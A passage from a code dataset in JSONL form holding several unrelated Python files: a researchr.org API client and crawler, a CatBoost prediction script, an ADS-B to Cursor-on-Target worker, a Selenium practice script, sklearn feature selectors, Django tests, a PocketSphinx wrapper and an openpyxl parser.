string\n @param key: The search term.\n @type index: number\n @param index: The page of results.\n @rtype: dict\n @return: Index, kind of search, array of results and the search term.\n \"\"\"\n data = self.__makeRequest(\"search/conference\", key, index)\n return self.__decode(data)\n \n def getPublication(self, key):\n \"\"\"\n Get the publication from researchr.org.\n\n @type key: string\n @param key: The name of a publication, which we want to find the record.\n @rtype: dict\n @return: Detail informations of publication.\n \"\"\"\n data = self.__makeRequest(\"publication\", key, \"\")\n return self.__decode(data)\n \n def getPerson(self, key):\n \"\"\"\n Get the person (author) from researchr.org.\n\n @type key: string\n @param key: The name of a person, which we want to find the record.\n @rtype: dict\n @return: Detail informations of person.\n \"\"\"\n data = self.__makeRequest(\"person\", key, \"\")\n return self.__decode(data)\n \n def getBibliography(self, key):\n \"\"\"\n Get the bibliography from researchr.org.\n\n @type key: string\n @param key: The name of a bibliography, which we want to find the record.\n @rtype: dict\n @return: Detail informations of bibliography.\n \"\"\"\n data = self.__makeRequest(\"bibliography\", key, \"\")\n return self.__decode(data)\n \n def __makeRequest(self, term, key, index):\n \"\"\"\n Make request to researchr.org for get content.\n\n @type term: string\n @param term: The name of service.\n @type key: string\n @param key: The search term.\n @rtype: string\n @return: Data in JSON format.\n \"\"\"\n if not index==\"\":\n try:\n int(index)\n except:\n raise ValueError(\"Index parameter must be a number\")\n self.conn = httplib.HTTPConnection(\"researchr.org\")\n self.conn.request(\"GET\", \"/api/%s/%s/%s\" % (term, key, index))\n res = self.conn.getresponse()\n if res.status != 200:\n raise HTTPStatusException(\"Page return error code %d: %s\" % (res.status, res.reason))\n data = res.read()\n return data\n \n def __decode(self, data):\n \"\"\"\n Decode data.\n\n @type data: string\n @param data: Data you want to decode.\n @rtype: dict\n @return: Decoded data (clear dict format).\n \"\"\"\n self.conn.close()\n return json.loads(data.decode(self.encoding))\n\n def __searchUsefulUrls(self, urls, rootUrl):\n \"\"\"\n Search for usefull urls. If cycle found next page of urls it call itself.\n If cycle found url of person, it call itself too.\n If cycle found publication, it save this publication into file.\n\n @type urls: dict\n @param urls: List of urls from which we get only the applicable.\n @type rootUrl: string\n @param rootUrl: Root url from which we began to look for.\n \"\"\"\n refFound = 0\n for url in urls:\n # search for next url\n if \"/explore/authors/1/\" in url and \"researchr.org/\" not in url and url not in rootUrl:\n print(\"Nasel jsem dalsi uroven: %s\" % url)\n refFound = 1\n urls = self.__getUrlsFromPage(url)\n self.__searchUsefulUrls(urls, url)\n\n # search for people\n elif \"/alias/\" in url and \"advised\" not in url and \"researchr.org/\" not in url and \"/alias/\" not in rootUrl and refFound == 0:\n print(\"Nasel jsme alias: %s\" % url)\n urls = self.__getUrlsFromPage(url)\n self.__searchUsefulUrls(urls, url)\n\n # search for publications\n elif \"/publication/\" in url and \"researchr.org/\" not in url:\n print(\"Nasel jsem publikaci: %s\" % url)\n with open(self.filename, \"ab\") as myFile:\n myFile.write(url.replace(\"/publication/\",\"\")+ \";\")\n\n def __getUrlsFromPage(self,url):\n \"\"\"\n Search for urls on page.\n\n @type url: dict\n @param url: Url of page where we want to find urls.\n @rtype: dict\n @return: List of urls.\n \"\"\"\n req = urllib2.Request(\"http://researchr.org%s\" % url)\n req.add_header('User-agent', self.userAgents[random.randint(0, 11)])\n try:\n resp = urllib2.urlopen(req) \n except:\n try:\n time.sleep(random.uniform(self.secondLimitMin, self.secondLimitMax))\n req = urllib2.Request(\"http://researchr.org%s\" % url)\n req.add_header('User-agent', self.userAgents[random.randint(0, 11)])\n resp = urllib2.urlopen(req)\n except:\n time.sleep(random.uniform(self.thirdLimitMin, self.thirdLimitMax))\n try:\n req = urllib2.Request(\"http://researchr.org%s\" % url)\n req.add_header('User-agent', self.userAgents[random.randint(0, 11)])\n resp = urllib2.urlopen(req)\n except:\n print(\"Error in url: %s\" % url)\n try:\n content = resp.read()\n except:\n print(\"Error in url: %s\" % url)\n time.sleep(random.uniform(self.firstLimitMin, self.firstLimitMax))\n urls = re.findall('/(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', content)\n return urls\n \n def getPublicationsNames(self, filename, mainLetter):\n \"\"\"\n Get name of all publications which are in reaearchr menu.\n\n @type filename: string\n @param filename: Filename where we want to save results.\n @type mainLetter: string\n @param mainLetter: First letter of authors from which we will find their publications.\n \"\"\"\n self.filename = filename\n for letter in \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\":\n self.__searchUsefulUrls(self.__getUrlsFromPage(\"/explore/authors/1/%s%s\" % (mainLetter,letter)),\"/explore/authors/1/%s%s\" % (mainLetter,letter))\n","sub_path":"bin/example/researchr.py","file_name":"researchr.py","file_ext":"py","file_size_in_byte":8698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"345989633","text":"import pandas as pd\nfrom catboost import Pool, CatBoostRegressor\nfrom sklearn.model_selection import train_test_split\n\nimport a2_transform.features as features\nfrom a0_helpers.constants import FILE_INTER_FEATURES, DIR_DATA_RESULTS\nfrom a4_optimise.optimise import select_team\n\nfeatures.main()\ndf_all = pd.read_csv(FILE_INTER_FEATURES, encoding='utf-8-sig')\ndf_model = df_all[df_all['points'].notnull()]\n\nFIELDS_META = ['season_name', 'gameweek', 'code', 'id', 'web_name', 'team_name', 'player_position',\n 'cost', 'selected_by_percent']\nFIELD_FEATURES = ['points_mean_last_season', 'points_prev', 'status', 'chance_of_playing', 'cost', 'nb_games']\nCAT_FEATURES = [2]\n\nFIELDS_COMBINED = FIELDS_META + [field for field in FIELD_FEATURES if field not in FIELDS_META]\nFIELD_TARGET = 'points'\n\n\nX = df_model[FIELD_FEATURES]\ny = df_model[FIELD_TARGET]\nprint(X.shape)\nprint(y.shape)\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=42)\n\n# initialize Pool\npool = Pool(X, y, cat_features=CAT_FEATURES)\ntrain_pool = Pool(X_train, y_train, cat_features=CAT_FEATURES)\ntest_pool = Pool(X_test, y_test, cat_features=CAT_FEATURES)\n\n# specify the training parameters\n# model = CatBoostRegressor(iterations=2, depth=2, learning_rate=1, loss_function='RMSE')\nmodel = CatBoostRegressor()\n# train the model\nmodel.fit(train_pool, use_best_model=True, eval_set=test_pool)\n\n# Output the values\ndf_preds_all = pd.DataFrame(model.predict(df_all[FIELD_FEATURES]), columns=[\"points_predicted\"])\ndf_next_pred = pd.concat([df_all, df_preds_all], axis=1, sort=False)\ndf_next_pred.to_csv(DIR_DATA_RESULTS / 'Model_Simple_All_Predictions.csv', encoding='utf-8-sig', index=False)\n\n# make the prediction using the resulting model\ndf_next = df_all[df_all['points'].isnull()]\ndf_next = df_next.reset_index(drop=True)\ndf_preds = pd.DataFrame(model.predict(df_next[FIELD_FEATURES]), columns=[\"points_predicted\"])\ndf_next_pred = pd.concat([df_next, df_preds], axis=1, sort=False)\n\n\ndf_selection = select_team(df_next_pred)\ndf_selection.to_csv(DIR_DATA_RESULTS / 'Model_Simple_Week_Predict.csv', encoding='utf-8-sig', index=False)\n","sub_path":"code/a3_model/model_bootstrap_simple.py","file_name":"model_bootstrap_simple.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"326413044","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"ADS-B Cursor-on-Target Class Definitions.\"\"\"\n\nimport json\nimport logging\nimport os\nimport queue\nimport random\nimport threading\nimport time\n\nimport pycot\nimport requests\n\nimport adsbcot\n\n__author__ = 'Greg Albrecht W2GMD '\n__copyright__ = 'Copyright 2020 Orion Labs, Inc.'\n__license__ = 'Apache License, Version 2.0'\n\n\nclass ADSBWorker(threading.Thread):\n _logger = logging.getLogger(__name__)\n if not _logger.handlers:\n _logger.setLevel(adsbcot.LOG_LEVEL)\n _console_handler = logging.StreamHandler()\n _console_handler.setLevel(adsbcot.LOG_LEVEL)\n _console_handler.setFormatter(adsbcot.LOG_FORMAT)\n _logger.addHandler(_console_handler)\n _logger.propagate = False\n\n def __init__(self, msg_queue: queue.Queue, url: str, interval: int = None,\n stale: int = None, api_key: str = None):\n self.msg_queue: queue.Queue = msg_queue\n self.url: str = url\n self.interval: int = int(interval or adsbcot.DEFAULT_INTERVAL)\n self.stale: int = stale\n self.api_key: str = api_key\n\n # Thread setup:\n threading.Thread.__init__(self)\n self.daemon = True\n self._stopper = threading.Event()\n\n def stop(self):\n \"\"\"Stop the thread at the next opportunity.\"\"\"\n self._logger.debug('Stopping ADSBWorker')\n self._stopper.set()\n\n def stopped(self):\n \"\"\"Checks if the thread is stopped.\"\"\"\n return self._stopper.isSet()\n\n def _put_queue(self, aircraft: list) -> None:\n if not aircraft:\n self._logger.warning('Empty aircraft list')\n return False\n\n i = 1\n for craft in aircraft:\n cot_event = adsbcot.adsb_to_cot(craft, stale=self.stale)\n if not cot_event:\n self._logger.debug(f'Empty CoT Event for craft={craft}')\n i += 1\n continue\n\n self._logger.debug(\n 'Handling %s/%s ICAO24: %s Flight: %s ',\n i, len(aircraft), craft.get('hex'), craft.get('flight'))\n\n rendered_event = cot_event.render(\n encoding='UTF-8', standalone=True)\n\n if rendered_event:\n try:\n self.msg_queue.put(rendered_event, True, 10)\n except queue.Full as exc:\n self._logger.exception(exc)\n self._logger.warning(\n 'Lost CoT Event (queue full): \"%s\"', rendered_event)\n i += 1\n\n def _get_dump1090_feed(self):\n response = requests.get(self.url)\n if response.ok:\n aircraft = response.json().get('aircraft')\n self._logger.debug('Retrieved %s aircraft', len(aircraft))\n self._put_queue(aircraft)\n\n def _get_adsbx_feed(self) -> None:\n headers = {'api-auth': self.api_key}\n response = requests.get(self.url, headers=headers)\n jresponse = json.loads(response.text)\n aircraft = jresponse.get('ac')\n self._logger.debug('Retrieved %s aircraft', len(aircraft))\n self._put_queue(aircraft)\n\n def run(self):\n \"\"\"Runs this Thread, Reads from Pollers.\"\"\"\n self._logger.info('Running ADSBWorker')\n\n self.msg_queue.put(\n adsbcot.hello_event().render(encoding='UTF-8', standalone=True))\n\n while not self.stopped():\n if 'aircraft.json' in self.url:\n self._get_dump1090_feed()\n else:\n self._get_adsbx_feed()\n time.sleep(self.interval)\n","sub_path":"adsbcot/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":3592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"140183282","text":"from selenium import webdriver #导入selenium包\nfrom selenium.webdriver.support.ui import Select#导入下拉列表包\nfrom selenium.webdriver.support.ui import WebDriverWait#创建显示等待对象\nimport time\nclass selenium:\n def __init__(self):\n self.wd=webdriver.Firefox() #获取Firefox网页\n self.wd.maximize_window() #让网页全屏 窗口设置\n self.wd.get('http://www.baidu.com') #输入网址\n\n def count(self):\n self.wd.find_element_by_id('kw').send_keys('蜗牛学院') #获取输入的文本框输入蜗牛学院\n self.wd.find_element_by_id('su').click() #点击百度一下\n self.wd.find_element_by_link_text('蜗牛学院-移动互联网人才孵化基地_自动化测试培训_JAVA开发培训_...').click()\n time.sleep(2)\n handle=self.wd.current_window_handle #当前焦点所在页面handle\n handles=self.wd.window_handles#打开目标网站后,所有页面handle,返回的是列表\n for i in handles:\n if i!=handle:\n self.wd.switch_to.window(i)\n self.wd.switch_to.frame(self.wd.find_element_by_link_text('在线课堂'))\n time.sleep(2)\n self.wd.find_element_by_link_text('在线课堂').click()\n self.wd.quit() #关闭网页\nselenium().count()\n# class selenium_login:\n# def __init__(self):\n# self.ws=webdriver.Firefox() #获取Firefox页面\n# self.ws.maximize_window() #让网页全屏 窗口设置\n# self.ws.get('http://localhost/Agileone/')#输入网址\n# self.login()\n# self.sub()\n # def login(self):\n # time.sleep(2)#等待2秒进入下一个操作\n # ws=self.ws\n # ws.find_element_by_id('username').clear()\n # ele=ws.find_element_by_id('username')\n # ele.send_keys('admin')#获取用户名文本框并输入用户名admin\n # ws.find_element_by_id('password').clear()\n # ws.find_element_by_id('password').send_keys('admin')#获取密码文本框并输入密码admin\n # ws.find_element_by_id('login').click() #点击登录\n # def sub(self):\n # time.sleep(3)#等待3秒进行下一步操作\n # ws=self.ws\n # # Select(self.ws.find_element_by_id('newitem')).select_by_index(1).click()\n # # self.ws.find_element_by_id('button').click()\n # ws.find_element_by_link_text('※ 公告管理 ※').click() #找到公共管理并点击进入\n # time.sleep(1)\n # ws.find_element_by_id('noticeid').send_keys('01')\n # ws.find_element_by_id('headline').clear()\n # ws.find_element_by_id('headline').send_keys('蜗牛学院')\n # ws.switch_to.frame(self.ws.find_element_by_class_name('ke-iframe'))#切换焦点\n # lcc=ws.find_element_by_xpath('/html')#获取绝对路径\n # lcc.send_keys('sdsds') #在html中添加内容\n # time.sleep(2)\n # ws.find_element_by_id('add').click()\n # ws.find_element_by_id('')\n # time.sleep(2)\n # print(ws.find_element_by_id('msg').text)\n # def __del__(self):\n # self.ws.quit()\n# selenium_login()\n\n","sub_path":"WoniuXUYyuan/Dome/sele_Dome04.py","file_name":"sele_Dome04.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"72168511","text":"import logging\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.feature_selection import SelectKBest, chi2\nimport numpy as np\nfrom sklearn.feature_selection.univariate_selection import _clean_nans\nfrom discoutils.thesaurus_loader import Vectors\nfrom eval.utils.misc import calculate_log_odds, update_dict_according_to_mask\n\n__author__ = 'mmb28'\n\n\nclass VectorBackedSelectKBest(SelectKBest):\n \"\"\"\n An extention of sklearn's SelectKBest, which also contains a VectorStore. Feature selection is done\n in two optional steps:\n 1: Remove all features that are not contained in the vector store\n 2: Remove any remaining low-scoring features to ensure a maximum of k features are left fit\n\n Additionally, this class stores a vocabulary (like a vectorizer), which maps features to a corresponding columns\n in the feature vector matrix. This is so that a FeatureVectorsCsvDumper can be placed after this object in a\n pipeline.\n\n Also, this object assumes its input is not a matrix X (as in SelectKBest), but a tuple (X, vocabulary). The\n vocabulary is provided by ThesaurusVectorizer, which comes before this object in a pipeline and represents the\n mapping of features to columns in X before any feature selection is done.\n \"\"\"\n\n def __init__(self, score_func=chi2, k='all', must_be_in_thesaurus=False, min_log_odds_score=0, **kwargs):\n \"\"\"\n :param min_log_odds_score: any feature with a log odds score between -min_log_odds_score and\n min_log_odds_score will be removed. Assumes the classification problem is binary.\n \"\"\"\n if not score_func:\n score_func = chi2\n self.k = k\n self.must_be_in_thesaurus = must_be_in_thesaurus\n self.min_log_odds_score = min_log_odds_score\n self.vocabulary_ = None\n super(VectorBackedSelectKBest, self).__init__(score_func=score_func, k=k)\n\n def fit(self, X, y, vector_source=None, clusters=None, **kwargs):\n if vector_source is None and clusters is None and self.must_be_in_thesaurus:\n logging.error('You requested feature selection based on vector presence '\n 'but did not provide a vector source.')\n raise ValueError('sector source (vectors or clusters) required with must_be_in_thesaurus')\n if self.must_be_in_thesaurus:\n self.vector_source = vector_source if vector_source else set(clusters.index)\n\n # Vectorizer also returns its vocabulary, store it and work with the rest\n X, self.vocabulary_ = X\n\n if self.k == 'all' or int(self.k) >= X.shape[1]:\n # do not bother calculating feature informativeness if all features will be used anyway\n self.scores_ = np.ones((X.shape[1],))\n else:\n super(VectorBackedSelectKBest, self).fit(X, y)\n\n self.vectors_mask = self._zero_score_of_oot_feats() \\\n if self.must_be_in_thesaurus else np.ones(X.shape[1], dtype=bool)\n self.log_odds_mask = self._zero_score_of_low_log_odds_features(X, y) \\\n if self.min_log_odds_score > 0 else np.ones(X.shape[1], dtype=bool);\n\n return self\n\n def transform(self, X):\n # Vectorizer also returns its vocabulary, remove it\n if self.vocabulary_:\n return super(VectorBackedSelectKBest, self).transform(X[0]), self.vocabulary_\n else:\n # Sometimes the training set contain no features. We don't want this to break the experiment,\n # so let is slide\n logging.error('Empty vocabulary')\n return X[0], self.vocabulary_\n\n def _zero_score_of_oot_feats(self):\n mask = np.ones(self.scores_.shape, dtype=bool)\n for feature, index in self.vocabulary_.items():\n if feature not in self.vector_source:\n mask[index] = False\n if np.count_nonzero(mask) == 0:\n logging.error('Feature selector removed all features')\n raise ValueError('Empty vocabulary')\n return mask\n\n def _zero_score_of_low_log_odds_features(self, X, y):\n if self.min_log_odds_score <= 0:\n # we don't want to use log odds score, return an all-true mask\n return np.ones(X.shape[1])\n if len(set(y)) != 2:\n raise ValueError('Calculating a log odds score requires a binary classification task')\n log_odds = calculate_log_odds(X, y)\n return (log_odds > self.min_log_odds_score) | (log_odds < -self.min_log_odds_score)\n\n def _get_support_mask(self):\n k = self.k\n chi2_scores = self.scores_\n chi2_mask = np.ones(chi2_scores.shape, dtype=bool)\n\n if k != 'all' and k < len(chi2_scores):\n # we don't want all features to be kept, and the number we want is less than the number available\n chi2_scores = _clean_nans(chi2_scores)\n selected_indices = np.argsort(chi2_scores)[:k]\n chi2_mask[selected_indices] = False\n\n mask = chi2_mask & self.vectors_mask & self.log_odds_mask\n logging.info('%d/%d features survived feature selection', np.count_nonzero(mask), len(mask))\n\n # Only keep the scores of the features that survived. This array is used to check the\n # input data shape at train and decode time matches. However, because the post-feature-selections\n # vocabulary is passed back into the vectorizer, at decode time the input will likely be smaller. This is\n # like doing feature selection in the vectorizer.\n self.scores_ = self.scores_[mask]\n self.log_odds_mask = self.log_odds_mask[mask]\n self.vectors_mask = self.vectors_mask[mask]\n\n self.vocabulary_ = update_dict_according_to_mask(self.vocabulary_, mask)\n return mask\n\n\nclass MetadataStripper(BaseEstimator, TransformerMixin):\n \"\"\"\n The current implementation of ThesaurusVectorizer's fit() returns not just a data matrix, but also some\n metadata (its vocabulary). This class is meant to sit in a pipeline behind the vectorizer to remove that\n metadata, so that it doesn't break other items in the pipeline.\n\n Currently several other pipeline elements can make use of this data ( VectorBackedSelectKBest and\n FeatureVectorsCsvDumper). This class must come after these in a pipeline as they do not have any\n defensive checks\n \"\"\"\n\n def fit(self, X, y, vector_source=None, strategy='linear', k=None, **kwargs):\n matrix, self.voc = X # store voc, may be handy for for debugging\n self.vector_source = vector_source\n if isinstance(self.vector_source, Vectors):\n # the vector source can be either a Thesaurus or Vectors. Both can provide nearest neighbours,\n # but the latter needs this method to be called first\n if not k:\n k = 10\n self.vector_source.init_sims([str(foo) for foo in self.voc.keys()],\n strategy=strategy, n_neighbors=k)\n return self\n\n def transform(self, X, **kwargs):\n # if X is a tuple, strip metadata, otherwise let it be\n return X[0] if tuple(X) == X else X\n\n def get_params(self, deep=True):\n return super(MetadataStripper, self).get_params(deep)\n","sub_path":"builder/composers/feature_selectors.py","file_name":"feature_selectors.py","file_ext":"py","file_size_in_byte":7243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"405515583","text":"from django.test import TestCase\nfrom rest_framework.test import APITestCase\nfrom django.urls import reverse\nfrom django.shortcuts import get_object_or_404\nfrom rest_framework import status\n\nimport json\nfrom api.account.user_serializer import UserProfileSerializer\nfrom api.account.profile_serializer import ProfileSerializer\n\nfrom profiles.models import Profile\nfrom django.contrib.auth import get_user_model\nUser = get_user_model()\n\n\nclass UserSerializerTestCase(TestCase):\n \"\"\"compare expected and received data after ser-on\"\"\"\n def setUp(self): \n self.user = User.objects.create(email=\"zoo@mail.com\") \n self.profile = Profile.objects.last() \n \n def test_user_serializer(self): \n \"\"\" check weather user info comes with his profile \"\"\" \n serial_user = UserProfileSerializer(self.user).data\n expected_data = {\n \"id\":self.user.id,\n \"email\":self.user.email,\n \"first_name\":self.user.first_name,\n \"last_name\":self.user.last_name,\n \"profile\":{\n \"unid\":self.profile.unid, \n \"user_id\": self.user.id, \n \"first_name\":\"\",\n \"last_name\":\"\",\n \"display_name\":\"\",\n \"image\":None,\n \"website\":\"\",\n \"linkedin_profile\":\"\",\n \"name\":self.user.get_name\n }\n \n } \n self.assertEqual(serial_user, expected_data)\n\n def test_user_serializer_via_profile_attr(self): \n \"\"\" check weather user info comes with his profile via obj user\"\"\" \n serial_user = UserProfileSerializer(self.user).data\n expected_data = {\n \"id\":self.user.id,\n \"email\":self.user.email,\n \"first_name\":self.user.first_name,\n \"last_name\":self.user.last_name,\n \"profile\":{\n # here \n \"unid\":self.user.profile.unid, \n \"user_id\": self.user.id, \n \"first_name\":\"\",\n \"last_name\":\"\",\n \"display_name\":\"\",\n \"image\":None,\n \"website\":\"\",\n \"linkedin_profile\":\"\",\n \"name\":self.user.get_name\n }\n \n } \n self.assertEqual(serial_user, expected_data)\n\n \n\n","sub_path":"api/tests/tests_user/test_serializers.py","file_name":"test_serializers.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"443571522","text":"########################################################\n# Adapted from the SpeechRecognition (3.5.0) by Uberi\n# https://github.com/Uberi/speech_recognition\n########################################################\n\nimport os\nimport tempfile, shutil\n \n \nclass RequestError(Exception): pass\n\ntry:\n\tfrom pocketsphinx import pocketsphinx\n\tfrom sphinxbase import sphinxbase\nexcept ImportError:\n\traise RequestError(\"missing PocketSphinx module:\\\n\t ensure that PocketSphinx is set up correctly.\")\nexcept ValueError:\n\traise RequestError(\"bad PocketSphinx installation detected;\\\n\t make sure you have PocketSphinx version 0.0.9 or better.\")\n\n\n\n\nclass tempfile_TemporaryDirectory(object):\n \"\"\"Python 2 compatibility: backport of ``tempfile.TemporaryDirectory``\n from Python 3\"\"\"\n\n def __enter__(self):\n self.name = tempfile.mkdtemp()\n return self.name\n\n def __exit__(self, exc_type, exc_value, traceback):\n shutil.rmtree(self.name)\n\n\nclass Sphinx():\n\t\"\"\"\n\t\tPerforms speech recognition on raw audio data, using CMU Sphinx.\n\n\t\tThe recognition language is determined by ``language``, an RFC5646\n\t\tlanguage tag like ``\"en-US\"`` or ``\"en-GB\"``, defaulting to US English.\n\t\tOut of the box, only ``en-US`` is supported.\n\n\t\"\"\"\n\n\tdef __init__(self, language = \"en-US\"):\n\t\t\"\"\"[summary]\n\t\t\n\t\t[description]\n\t\t\n\t\tKeyword Arguments:\n\t\t\tlanguage {str} -- [description] (default: {\"en-US\"})\n\t\t\n\t\tRaises:\n\t\t\tRequestError -- There are issues with the Sphinx installation.\n\t\t\"\"\"\n\t\tassert isinstance(language, str), \"``language`` must be a string\"\n\n\t\tlanguage_directory = os.path.join(os.path.dirname(\n\t\t\tos.path.realpath(__file__)), \"pocketsphinx-data\", language)\n\n\t\tif not os.path.isdir(language_directory):\n\t\t\traise RequestError(\"missing PocketSphinx language data directory:\\\n\t\t\t \\\"{0}\\\"\".format(language_directory))\n\n\t\tacoustic_parameters_directory = os.path.join(language_directory, \n\t\t\t\"acoustic-model\")\n\n\t\tif not os.path.isdir(acoustic_parameters_directory):\n\t\t\traise RequestError(\"missing PocketSphinx language model parameters\\\n\t\t\t directory: \\\"{0}\\\"\".format(acoustic_parameters_directory))\n\t\t\n\t\tlanguage_model_file = os.path.join(language_directory, \n\t\t\t\"language-model.lm.bin\")\n\n\t\tif not os.path.isfile(language_model_file):\n\t\t\traise RequestError(\"missing PocketSphinx language model file:\\\n\t\t\t \\\"{0}\\\"\".format(language_model_file))\n\t\t\n\t\tphoneme_dictionary_file = os.path.join(language_directory,\n\t\t \"pronounciation-dictionary.dict\")\n\n\t\tif not os.path.isfile(phoneme_dictionary_file):\n\t\t\traise RequestError(\"missing PocketSphinx phoneme dictionary file:\\\n\t\t\t \\\"{0}\\\"\".format(phoneme_dictionary_file))\n\n\t\t# create decoder object\n\t\tconfig = pocketsphinx.Decoder.default_config()\n\t\t\n\t\t# set the path of the hidden Markov model (HMM) parameter files\n\t\tconfig.set_string(\"-hmm\", acoustic_parameters_directory)\n\t\t\n\t\tconfig.set_string(\"-lm\", language_model_file)\n\t\tconfig.set_string(\"-dict\", phoneme_dictionary_file)\n\n\t\t# disable logging (logging causes unwanted output in terminal)\n\t\tconfig.set_string(\"-logfn\", os.devnull)\n\n\t\tself.decoder = pocketsphinx.Decoder(config)\n\n\n\tdef recognize(self, raw_data, keyword_entries = None, show_all = False):\n\t\t\"\"\"Performs speech to text recognition using CMU Sphinx\n\t\t\n\t\tIt's possible to search for specific keywords in the speech.\n\t\tIf specified, the keywords to search for are determined by\n\t\t``keyword_entries``, an iterable of tuples of the form\n\t\t``(keyword, sensitivity)``, where ``keyword`` is a phrase, and\n\t\t``sensitivity`` is how sensitive to this phrase the recognizer\n\t\tshould be, on a scale of 0 (very insensitive, more false negatives)\n\t\tto 1 (very sensitive, more false positives) inclusive.\n\t\tIf not specified or ``None``, no keywords are used and Sphinx will\n\t\tsimply transcribe whatever words it recognizes.\n\t\tSpecifying ``keyword_entries`` is more accurate than just looking for\n\t\tthose same keywords in non-keyword-based transcriptions,\n\t\tbecause Sphinx knows specifically what sounds to look for.\n\t\t\n\t\tArguments:\n\t\t\traw_data {[type]} -- Raw audio data to be recognized\n\t\t\n\t\tKeyword Arguments:\n\t\t\tkeyword_entries {[type]} -- Keywords to search for (default: {None})\n\t\t\tshow_all {bool} -- Sets the return to the most likely transcription\n\t\t\t\tif false, otherwise returns the Sphinx \n\t\t\t\t``pocketsphinx.pocketsphinx.Decoder`` object resulting from the\n\t\t\t\trecognition. (default: {False})\n\t\t\n\t\tRaises:\n\t\t\tUnknownValueError -- The speech is unintelligible\n\t\t\"\"\"\n\t\t\n\t\t\n\t\tassert keyword_entries is None or all(isinstance(keyword, str) \\\n\t\t\tand 0 <= sensitivity <= 1 \\\n\t\t\tfor keyword, sensitivity in keyword_entries),\\\n\t\t\t \"``keyword_entries`` must be ``None`` or a list of pairs of\\\n\t\t\t strings and numbers between 0 and 1\"\n\n\t\t\n\t\t# obtain recognition results\n\t\tif keyword_entries is not None: # explicitly specified set of keywords\n\t\t\twith tempfile_TemporaryDirectory() as temp_directory:\n\t\t\t\t# generate a keywords file - Sphinx documentation recommendeds\n\t\t\t\t# sensitivities between 1e-50 and 1e-5\n\t\t\t\tkeywords_path = os.path.join(temp_directory, \"keyphrases.txt\")\n\t\t\t\t\n\t\t\t\twith open(keywords_path, \"w\") as f:\n\t\t\t\t\tf.writelines(\"{} /1e{}/\\n\"\n\t\t\t\t\t\t.format(keyword, 45 * sensitivity - 50) \n\t\t\t\t\t\tfor keyword, sensitivity in keyword_entries)\n\n\t\t\t\t# perform the speech recognition with the keywords file\n\t\t\t\t# (this is inside the context manager so the file isn't\n\t\t\t\t# deleted until we're done)\n\t\t\t\tself.decoder.set_kws(\"keywords\", keywords_path)\n\n\t\t\t\tself.decoder.set_search(\"keywords\")\n\n\t\t\t\t# begin utterance processing\n\t\t\t\tself.decoder.start_utt() \n\t\t\t\t\n\t\t\t\t# process audio data with recognition enabled\n\t\t\t\t# (no_search = False), as a full utterance (full_utt = True)\n\t\t\t\tself.decoder.process_raw(raw_data, False, True)\n\t\t\t\t\n\t\t\t\t# stop utterance processing\n\t\t\t\tself.decoder.end_utt() \n\n\t\telse: # no keywords, perform freeform recognition\n\t\t\tself.decoder.start_utt() # begin utterance processing\n\t\t\t\n\t\t\t# process audio data with recognition enabled (no_search = False),\n\t\t\t# as a full utterance (full_utt = True)\n\t\t\tself.decoder.process_raw(raw_data, False, True) \n\t\t\t\n\t\t\tself.decoder.end_utt() # stop utterance processing\n\n\t\tif show_all: return self.decoder\n\n\t\t# return results\n\t\thypothesis = self.decoder.hyp()\n\t\tif hypothesis is not None: return hypothesis.hypstr\n\t\traise UnknownValueError() # no transcriptions available\n","sub_path":"offline/VM/sphinx.py","file_name":"sphinx.py","file_ext":"py","file_size_in_byte":6291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"282830952","text":"import openpyxl\n\npath = '/Users/ahstein/PycharmProjects/Neptune/jupiter/testmodels/SampleBook1.xlsx'\n# path = '/Users/ahstein/PycharmProjects/Neptune/jupiter/testmodels/Netflix Model.xlsx'\nwb_obj = openpyxl.load_workbook(path, data_only=1)\nsheet_obj = wb_obj.active\ncell_obj = sheet_obj.cell(row=4, column=3)\n# the above refers to C4\n\nMaster_label_dict = {\"Revenue\", \"Rev\", \"Other Non-Operating Inc.\", \"Restructuring Charges\", \"Legal Settlements\",\n \"Other Unusual Items\", \"COGS\", \"Gross Margin\", \"Tech Costs\", \"Other SG&A\", \"EBITDA\",\n \"Provision for Bad Debts\", \"Depreciation & Amort.\"\n }\n\nlabels = {}\nfield_list = []\nfield_list_master = []\n\ndef row_sweep(self, row):\n # creates a list of all text in a given row\n for x in range(1, 3):\n cell_obj_new = sheet_obj.cell(row=row, column=x)\n # print(cell_obj_new.data_type, row, x)\n if cell_obj_new.data_type == 's':\n lab = cell_obj_new.value\n lab_addr = (row, x)\n new_element = (lab,lab_addr)\n field_list.append(new_element)\n\nfor a in range(4, 20):\n field_list_master = []\n row_sweep(self=None, row=a)\n field_list_master = field_list_master + field_list\nprint(\"Field list master is:\", field_list_master)\n\n# Getting the field name and address from the field master list\na1 = field_list_master[0]\nlabel1, address1 = a1[0], a1[1]\nrow1 = address1[0]\ncol1 = address1[1]\n\ndef nums_to_right(self, key, row1, col1):\n span_list = []\n for span in range(1,10):\n type = sheet_obj.cell(row1, col1 + span).data_type\n span_dict = {}\n if (type == 'n' or type == 'f'):\n value_10 = sheet_obj.cell(row1, col1 + span)._value\n span_list.append(value_10)\n span_dict[key] = span_list\n print(span_dict)\n\nfor i in field_list_master:\n key2 = i[0]\n row1v = i[1][0]\n col1v = i[1][1]\n nums_to_right(self=None, key=key2, row1=row1v, col1=col1v)\n\n# Old function, not in use\ndef array_strip(self, fieldlabel):\n global array1, array2, array3\n for ind in range(0, 10):\n row = labels[fieldlabel][0] + ind\n 